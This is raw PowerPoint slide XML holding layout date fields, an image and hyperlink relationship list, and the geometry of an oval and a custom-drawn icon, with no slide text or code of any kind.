              <a:t>2017/6/13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3966062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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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384319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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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3790231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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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189867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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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162108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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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1232528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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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585420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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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319934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39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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336892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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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2262301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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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41236638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9F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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C9E3A-FA4A-45AC-8649-598AFE359A55}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1014514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qlmap.sourceforge.net/" TargetMode="Externa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7.jpe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8.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.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1926" y="4145340"/>
            <a:ext cx="761996" cy="1015998"/>
            <a:chOff x="7527926" y="4145340"/>
            <a:chExt cx="761996" cy="1015998"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Oval 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7527926" y="4145340"/>
              <a:ext cx="761996" cy="1015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solidFill>
            <a:ln w="25402" cap="flat">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:tailEnd type="arrow"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="60963" tIns="45720" rIns="60963" bIns="45720" anchor="ctr" anchorCtr="1" compatLnSpc="1">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" hangingPunct="0">
                <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:uFillTx/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7714052" y="4393509"/>
              <a:ext cx="365869" cy="489944"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="f0" fmla="val 10800000"/>
                <a:gd name="f1" fmla="val 5400000"/>
                <a:gd name="f2" fmla="val 180"/>
                <a:gd name="f3" fmla="val w"/>
                <a:gd name="f4" fmla="val h"/>
                <a:gd name="f5" fmla="val 0"/>
                <a:gd name="f6" fmla="val 21019"/>
                <a:gd name="f7" fmla="val 21600"/>
                <a:gd name="f8" fmla="val 18846"/>
                <a:gd name="f9" fmla="val 7946"/>
                <a:gd name="f10" fmla="val 17740"/>
                <a:gd name="f11" fmla="val 9091"/>
                <a:gd name="f12" fmla="val 8939"/>
                <a:gd name="f13" fmla="val 17758"/>
                <a:gd name="f14" fmla="val 8792"/>
                <a:gd name="f15" fmla="val 17744"/>
                <a:gd name="f16" fmla="val 8636"/>
                <a:gd name="f17" fmla="val 17629"/>
                <a:gd name="f18" fmla="val 7331"/>
                <a:gd name="f19" fmla="val 17036"/>
                <a:gd name="f20" fmla="val 6068"/>
                <a:gd name="f21" fmla="val 16074"/>
                <a:gd name="f22" fmla="val 5080"/>
                <a:gd name="f23" fmla="val 15004"/>
                <a:gd name="f24" fmla="val 3980"/>
                <a:gd name="f25" fmla="val 13585"/>
                <a:gd name="f26" fmla="val 3348"/>
                <a:gd name="f27" fmla="val 12180"/>
                <a:gd name="f28" fmla="val 3345"/>
                <a:gd name="f29" fmla="val 13268"/>
                <a:gd name="f30" fmla="val 2218"/>
                <a:gd name="f31" fmla="val 13812"/>
                <a:gd name="f32" fmla="val 1659"/>
                <a:gd name="f33" fmla="val 14572"/>
                <a:gd name="f34" fmla="val 1350"/>
                <a:gd name="f35" fmla="val 15403"/>
                <a:gd name="f36" fmla="val 16460"/>
                <a:gd name="f37" fmla="val 17546"/>
                <a:gd name="f38" fmla="val 1840"/>
                <a:gd name="f39" fmla="val 18381"/>
                <a:gd name="f40" fmla="val 2696"/>
                <a:gd name="f41" fmla="val 19165"/>
                <a:gd name="f42" fmla="val 3500"/>
                <a:gd name="f43" fmla="val 19631"/>
                <a:gd name="f44" fmla="val 4499"/>
                <a:gd name="f45" fmla="val 19698"/>
                <a:gd name="f46" fmla="val 5510"/>
                <a:gd name="f47" fmla="val 19760"/>
                <a:gd name="f48" fmla="val 6453"/>
                <a:gd name="f49" fmla="val 19457"/>
                <a:gd name="f50" fmla="val 7317"/>
                <a:gd name="f51" fmla="val 5828"/>
                <a:gd name="f52" fmla="val 19330"/>
                <a:gd name="f53" fmla="val 5813"/>
                <a:gd name="f54" fmla="val 18425"/>
                <a:gd name="f55" fmla="val 5454"/>
                <a:gd name="f56" fmla="val 17482"/>
                <a:gd name="f57" fmla="val 4730"/>
                <a:gd name="f58" fmla="val 16740"/>
                <a:gd name="f59" fmla="val 4046"/>
                <a:gd name="f60" fmla="val 16035"/>
                <a:gd name="f61" fmla="val 3150"/>
                <a:gd name="f62" fmla="val 15629"/>
                <a:gd name="f63" fmla="val 2257"/>
                <a:gd name="f64" fmla="val 15593"/>
                <a:gd name="f65" fmla="val 2911"/>
                <a:gd name="f66" fmla="val 13158"/>
                <a:gd name="f67" fmla="val 2959"/>
                <a:gd name="f68" fmla="val 12996"/>
                <a:gd name="f69" fmla="val 3052"/>
                <a:gd name="f70" fmla="val 12836"/>
                <a:gd name="f71" fmla="val 3168"/>
                <a:gd name="f72" fmla="val 12696"/>
                <a:gd name="f73" fmla="val 4485"/>
                <a:gd name="f74" fmla="val 11727"/>
                <a:gd name="f75" fmla="val 6512"/>
                <a:gd name="f76" fmla="val 12013"/>
                <a:gd name="f77" fmla="val 7920"/>
                <a:gd name="f78" fmla="val 13461"/>
                <a:gd name="f79" fmla="val 9409"/>
                <a:gd name="f80" fmla="val 14991"/>
                <a:gd name="f81" fmla="val 9639"/>
                <a:gd name="f82" fmla="val 17231"/>
                <a:gd name="f83" fmla="val 8492"/>
                <a:gd name="f84" fmla="val 18569"/>
                <a:gd name="f85" fmla="val 8416"/>
                <a:gd name="f86" fmla="val 18610"/>
                <a:gd name="f87" fmla="val 8339"/>
                <a:gd name="f88" fmla="val 18649"/>
                <a:gd name="f89" fmla="val 8256"/>
                <a:gd name="f90" fmla="val 18676"/>
                <a:gd name="f91" fmla="val 2737"/>
                <a:gd name="f92" fmla="val 20165"/>
                <a:gd name="f93" fmla="val 2665"/>
                <a:gd name="f94" fmla="val 20182"/>
                <a:gd name="f95" fmla="val 2443"/>
                <a:gd name="f96" fmla="val 20240"/>
                <a:gd name="f97" fmla="val 2291"/>
                <a:gd name="f98" fmla="val 20250"/>
                <a:gd name="f99" fmla="val 1751"/>
                <a:gd name="f100" fmla="val 20245"/>
                <a:gd name="f101" fmla="val 1313"/>
                <a:gd name="f102" fmla="val 19793"/>
                <a:gd name="f103" fmla="val 19238"/>
                <a:gd name="f104" fmla="val 1321"/>
                <a:gd name="f105" fmla="val 19125"/>
                <a:gd name="f106" fmla="val 1365"/>
                <a:gd name="f107" fmla="val 18930"/>
                <a:gd name="f108" fmla="val 1380"/>
                <a:gd name="f109" fmla="val 18858"/>
                <a:gd name="f110" fmla="val 2071"/>
                <a:gd name="f111" fmla="val 16284"/>
                <a:gd name="f112" fmla="val 2822"/>
                <a:gd name="f113" fmla="val 16262"/>
                <a:gd name="f114" fmla="val 3630"/>
                <a:gd name="f115" fmla="val 16563"/>
                <a:gd name="f116" fmla="val 4265"/>
                <a:gd name="f117" fmla="val 17216"/>
                <a:gd name="f118" fmla="val 4911"/>
                <a:gd name="f119" fmla="val 17879"/>
                <a:gd name="f120" fmla="val 5214"/>
                <a:gd name="f121" fmla="val 18726"/>
                <a:gd name="f122" fmla="val 5181"/>
                <a:gd name="f123" fmla="val 19505"/>
                <a:gd name="f124" fmla="val 6888"/>
                <a:gd name="f125" fmla="val 11180"/>
                <a:gd name="f126" fmla="val 6280"/>
                <a:gd name="f127" fmla="val 10928"/>
                <a:gd name="f128" fmla="val 5642"/>
                <a:gd name="f129" fmla="val 10783"/>
                <a:gd name="f130" fmla="val 5004"/>
                <a:gd name="f131" fmla="val 10774"/>
                <a:gd name="f132" fmla="val 10063"/>
                <a:gd name="f133" fmla="val 5536"/>
                <a:gd name="f134" fmla="val 10838"/>
                <a:gd name="f135" fmla="val 4759"/>
                <a:gd name="f136" fmla="val 11966"/>
                <a:gd name="f137" fmla="val 4536"/>
                <a:gd name="f138" fmla="val 13077"/>
                <a:gd name="f139" fmla="val 4819"/>
                <a:gd name="f140" fmla="val 9717"/>
                <a:gd name="f141" fmla="val 13673"/>
                <a:gd name="f142" fmla="val 9473"/>
                <a:gd name="f143" fmla="val 13259"/>
                <a:gd name="f144" fmla="val 9194"/>
                <a:gd name="f145" fmla="val 12860"/>
                <a:gd name="f146" fmla="val 8848"/>
                <a:gd name="f147" fmla="val 12506"/>
                <a:gd name="f148" fmla="val 8447"/>
                <a:gd name="f149" fmla="val 12094"/>
                <a:gd name="f150" fmla="val 7986"/>
                <a:gd name="f151" fmla="val 11771"/>
                <a:gd name="f152" fmla="val 7507"/>
                <a:gd name="f153" fmla="val 11499"/>
                <a:gd name="f154" fmla="val 13767"/>
                <a:gd name="f155" fmla="val 5064"/>
                <a:gd name="f156" fmla="val 14259"/>
                <a:gd name="f157" fmla="val 5288"/>
                <a:gd name="f158" fmla="val 14729"/>
                <a:gd name="f159" fmla="val 5607"/>
                <a:gd name="f160" fmla="val 15145"/>
                <a:gd name="f161" fmla="val 6035"/>
                <a:gd name="f162" fmla="val 15500"/>
                <a:gd name="f163" fmla="val 6398"/>
                <a:gd name="f164" fmla="val 15775"/>
                <a:gd name="f165" fmla="val 6806"/>
                <a:gd name="f166" fmla="val 15987"/>
                <a:gd name="f167" fmla="val 7229"/>
                <a:gd name="f168" fmla="val 10519"/>
                <a:gd name="f169" fmla="val 16062"/>
                <a:gd name="f170" fmla="val 10465"/>
                <a:gd name="f171" fmla="val 15453"/>
                <a:gd name="f172" fmla="val 10298"/>
                <a:gd name="f173" fmla="val 14855"/>
                <a:gd name="f174" fmla="val 10047"/>
                <a:gd name="f175" fmla="val 14289"/>
                <a:gd name="f176" fmla="val 16257"/>
                <a:gd name="f177" fmla="val 7906"/>
                <a:gd name="f178" fmla="val 16637"/>
                <a:gd name="f179" fmla="val 9140"/>
                <a:gd name="f180" fmla="val 16442"/>
                <a:gd name="f181" fmla="val 10429"/>
                <a:gd name="f182" fmla="val 15610"/>
                <a:gd name="f183" fmla="val 11285"/>
                <a:gd name="f184" fmla="val 15604"/>
                <a:gd name="f185" fmla="val 11291"/>
                <a:gd name="f186" fmla="val 15598"/>
                <a:gd name="f187" fmla="val 11294"/>
                <a:gd name="f188" fmla="val 11299"/>
                <a:gd name="f189" fmla="val 15602"/>
                <a:gd name="f190" fmla="val 11307"/>
                <a:gd name="f191" fmla="val 10525"/>
                <a:gd name="f192" fmla="val 16566"/>
                <a:gd name="f193" fmla="val 10527"/>
                <a:gd name="f194" fmla="val 16398"/>
                <a:gd name="f195" fmla="val 10534"/>
                <a:gd name="f196" fmla="val 16233"/>
                <a:gd name="f197" fmla="val 19308"/>
                <a:gd name="f198" fmla="val 1741"/>
                <a:gd name="f199" fmla="val 18228"/>
                <a:gd name="f200" fmla="val 632"/>
                <a:gd name="f201" fmla="val 16805"/>
                <a:gd name="f202" fmla="val 14220"/>
                <a:gd name="f203" fmla="val 13131"/>
                <a:gd name="f204" fmla="val 450"/>
                <a:gd name="f205" fmla="val 12335"/>
                <a:gd name="f206" fmla="val 1266"/>
                <a:gd name="f207" fmla="val 9138"/>
                <a:gd name="f208" fmla="val 4577"/>
                <a:gd name="f209" fmla="val 9129"/>
                <a:gd name="f210" fmla="val 4585"/>
                <a:gd name="f211" fmla="val 9118"/>
                <a:gd name="f212" fmla="val 4592"/>
                <a:gd name="f213" fmla="val 9108"/>
                <a:gd name="f214" fmla="val 4602"/>
                <a:gd name="f215" fmla="val 9103"/>
                <a:gd name="f216" fmla="val 4608"/>
                <a:gd name="f217" fmla="val 9100"/>
                <a:gd name="f218" fmla="val 4614"/>
                <a:gd name="f219" fmla="val 9095"/>
                <a:gd name="f220" fmla="val 4620"/>
                <a:gd name="f221" fmla="val 9096"/>
                <a:gd name="f222" fmla="val 4621"/>
                <a:gd name="f223" fmla="val 2310"/>
                <a:gd name="f224" fmla="val 11648"/>
                <a:gd name="f225" fmla="val 1998"/>
                <a:gd name="f226" fmla="val 11967"/>
                <a:gd name="f227" fmla="val 1771"/>
                <a:gd name="f228" fmla="val 12365"/>
                <a:gd name="f229" fmla="val 1645"/>
                <a:gd name="f230" fmla="val 12798"/>
                <a:gd name="f231" fmla="val 102"/>
                <a:gd name="f232" fmla="val 18542"/>
                <a:gd name="f233" fmla="val 100"/>
                <a:gd name="f234" fmla="val 18558"/>
                <a:gd name="f235" fmla="val 19009"/>
                <a:gd name="f236" fmla="val 20542"/>
                <a:gd name="f237" fmla="val 1030"/>
                <a:gd name="f238" fmla="val 2302"/>
                <a:gd name="f239" fmla="val 2554"/>
                <a:gd name="f240" fmla="val 3044"/>
                <a:gd name="f241" fmla="val 21476"/>
                <a:gd name="f242" fmla="val 3062"/>
                <a:gd name="f243" fmla="val 21474"/>
                <a:gd name="f244" fmla="val 8630"/>
                <a:gd name="f245" fmla="val 19970"/>
                <a:gd name="f246" fmla="val 9054"/>
                <a:gd name="f247" fmla="val 19840"/>
                <a:gd name="f248" fmla="val 9439"/>
                <a:gd name="f249" fmla="val 19605"/>
                <a:gd name="f250" fmla="val 9750"/>
                <a:gd name="f251" fmla="val 19284"/>
                <a:gd name="f252" fmla="val 19776"/>
                <a:gd name="f253" fmla="val 8899"/>
                <a:gd name="f254" fmla="val 7023"/>
                <a:gd name="f255" fmla="val 21394"/>
                <a:gd name="f256" fmla="val 3881"/>
                <a:gd name="f257" fmla="+- 0 0 -90"/>
                <a:gd name="f258" fmla="*/ f3 1 21019"/>
                <a:gd name="f259" fmla="*/ f4 1 21600"/>
                <a:gd name="f260" fmla="+- f7 0 f5"/>
                <a:gd name="f261" fmla="+- f6 0 f5"/>
                <a:gd name="f262" fmla="*/ f257 f0 1"/>
                <a:gd name="f263" fmla="*/ f261 1 21019"/>
                <a:gd name="f264" fmla="*/ f260 1 21600"/>
                <a:gd name="f265" fmla="*/ f262 1 f2"/>
                <a:gd name="f266" fmla="*/ 182547 1 f263"/>
                <a:gd name="f267" fmla="*/ 183348 1 f264"/>
                <a:gd name="f268" fmla="*/ 0 1 f263"/>
                <a:gd name="f269" fmla="*/ 21019 1 f263"/>
                <a:gd name="f270" fmla="*/ 0 1 f264"/>
                <a:gd name="f271" fmla="*/ 21600 1 f264"/>
                <a:gd name="f272" fmla="+- f265 0 f1"/>
                <a:gd name="f273" fmla="*/ f268 f258 1"/>
                <a:gd name="f274" fmla="*/ f269 f258 1"/>
                <a:gd name="f275" fmla="*/ f271 f259 1"/>
                <a:gd name="f276" fmla="*/ f270 f259 1"/>
                <a:gd name="f277" fmla="*/ f266 f258 1"/>
                <a:gd name="f278" fmla="*/ f267 f259 1"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="3cd4">
                  <a:pos x="hc" y="t"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="r" y="vc"/>
                </a:cxn>
                <a:cxn ang="cd4">
                  <a:pos x="hc" y="b"/>
                </a:cxn>
                <a:cxn ang="cd2">
                  <a:pos x="l" y="vc"/>
                </a:cxn>
                <a:cxn ang="f272">
                  <a:pos x="f277" y="f278"/>
                </a:cxn>
                <a:cxn ang="f272">
                  <a:pos x="f277" y="f278"/>
                </a:cxn>
                <a:cxn ang="f272">
                  <a:pos x="f277" y="f278"/>
                </a:cxn>
                <a:cxn ang="f272">
                  <a:pos x="f277" y="f278"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="f273" t="f276" r="f274" b="f275"/>
              <a:pathLst>
                <a:path w="21019" h="21600">
                  <a:moveTo>
                    <a:pt x="f8" y="f9"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="f10" y="f11"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f10" y="f12"/>
                    <a:pt x="f13" y="f14"/>
                    <a:pt x="f15" y="f16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f17" y="f18"/>
                    <a:pt x="f19" y="f20"/>
                    <a:pt x="f21" y="f22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f23" y="f24"/>
                    <a:pt x="f25" y="f26"/>
                    <a:pt x="f27" y="f28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f29" y="f30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f31" y="f32"/>
                    <a:pt x="f33" y="f34"/>
                    <a:pt x="f35" y="f34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f36" y="f34"/>
                    <a:pt x="f37" y="f38"/>
                    <a:pt x="f39" y="f40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f41" y="f42"/>
                    <a:pt x="f43" y="f44"/>
                    <a:pt x="f45" y="f46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f47" y="f48"/>
                    <a:pt x="f49" y="f50"/>
                    <a:pt x="f8" y="f9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="f51" y="f52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="f53" y="f54"/>
                    <a:pt x="f55" y="f56"/>
                    <a:pt x="f57" y="f58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f59" y="f60"/>
                    <a:pt x="f61" y="f62"/>
                    <a:pt x="f63" y="f64"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f65" y="f66"/>
                  </a:ln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89" y="f90"/>
                    <a:pt x="f51" y="f52"/>
                    <a:pt x="f51" y="f52"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="f91" y="f92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="f93" y="f94"/>
                    <a:pt x="f95" y="f96"/>
                    <a:pt x="f97" y="f98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f99" y="f100"/>
                    <a:pt x="f101" y="f102"/>
                    <a:pt x="f101" y="f103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f104" y="f105"/>
                    <a:pt x="f106" y="f107"/>
                    <a:pt x="f108" y="f109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f110" y="f111"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f112" y="f113"/>
                    <a:pt x="f114" y="f115"/>
                    <a:pt x="f116" y="f117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f118" y="f119"/>
                    <a:pt x="f120" y="f121"/>
                    <a:pt x="f122" y="f123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f122" y="f123"/>
                    <a:pt x="f91" y="f92"/>
                    <a:pt x="f91" y="f92"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="f124" y="f125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="f126" y="f127"/>
                    <a:pt x="f128" y="f129"/>
                    <a:pt x="f130" y="f131"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f132" y="f133"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f134" y="f135"/>
                    <a:pt x="f136" y="f137"/>
                    <a:pt x="f138" y="f139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f138" y="f139"/>
                    <a:pt x="f124" y="f125"/>
                    <a:pt x="f124" y="f125"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="f140" y="f141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="f142" y="f143"/>
                    <a:pt x="f144" y="f145"/>
                    <a:pt x="f146" y="f147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f148" y="f149"/>
                    <a:pt x="f150" y="f151"/>
                    <a:pt x="f152" y="f153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f154" y="f155"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f156" y="f157"/>
                    <a:pt x="f158" y="f159"/>
                    <a:pt x="f160" y="f161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f162" y="f163"/>
                    <a:pt x="f164" y="f165"/>
                    <a:pt x="f166" y="f167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f166" y="f167"/>
                    <a:pt x="f140" y="f141"/>
                    <a:pt x="f140" y="f141"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="f168" y="f169"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="f170" y="f171"/>
                    <a:pt x="f172" y="f173"/>
                    <a:pt x="f174" y="f175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f176" y="f177"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f178" y="f179"/>
                    <a:pt x="f180" y="f181"/>
                    <a:pt x="f182" y="f183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f184" y="f185"/>
                    <a:pt x="f186" y="f187"/>
                    <a:pt x="f64" y="f188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f189" y="f190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="f191" y="f192"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f193" y="f194"/>
                    <a:pt x="f195" y="f196"/>
                    <a:pt x="f168" y="f169"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="f197" y="f198"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="f199" y="f200"/>
                    <a:pt x="f201" y="f5"/>
                    <a:pt x="f35" y="f5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f202" y="f5"/>
                    <a:pt x="f203" y="f204"/>
                    <a:pt x="f205" y="f206"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f207" y="f208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f209" y="f210"/>
                    <a:pt x="f211" y="f212"/>
                    <a:pt x="f213" y="f214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f215" y="f216"/>
                    <a:pt x="f217" y="f218"/>
                    <a:pt x="f219" y="f220"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f221" y="f222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="f223" y="f224"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f225" y="f226"/>
                    <a:pt x="f227" y="f228"/>
                    <a:pt x="f229" y="f230"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f231" y="f232"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f233" y="f234"/>
                    <a:pt x="f5" y="f235"/>
                    <a:pt x="f5" y="f103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f5" y="f236"/>
                    <a:pt x="f237" y="f7"/>
                    <a:pt x="f238" y="f7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f239" y="f7"/>
                    <a:pt x="f240" y="f241"/>
                    <a:pt x="f242" y="f243"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f244" y="f245"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f246" y="f247"/>
                    <a:pt x="f248" y="f249"/>
                    <a:pt x="f250" y="f251"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f252" y="f253"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f7" y="f254"/>
                    <a:pt x="f255" y="f256"/>
                    <a:pt x="f197" y="f198"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:uFillTx/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6051551" y="4145340"/>
            <a:ext cx="761996" cy="1015998"/>
            <a:chOff x="4527551" y="4145340"/>
            <a:chExt cx="761996" cy="1015998"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4527551" y="4145340"/>
              <a:ext cx="761996" cy="1015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solidFill>
            <a:ln w="25402" cap="flat">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:tailEnd type="arrow"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="60963" tIns="45720" rIns="60963" bIns="45720" anchor="ctr" anchorCtr="1" compatLnSpc="1">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" hangingPunct="0">
                <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:uFillTx/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
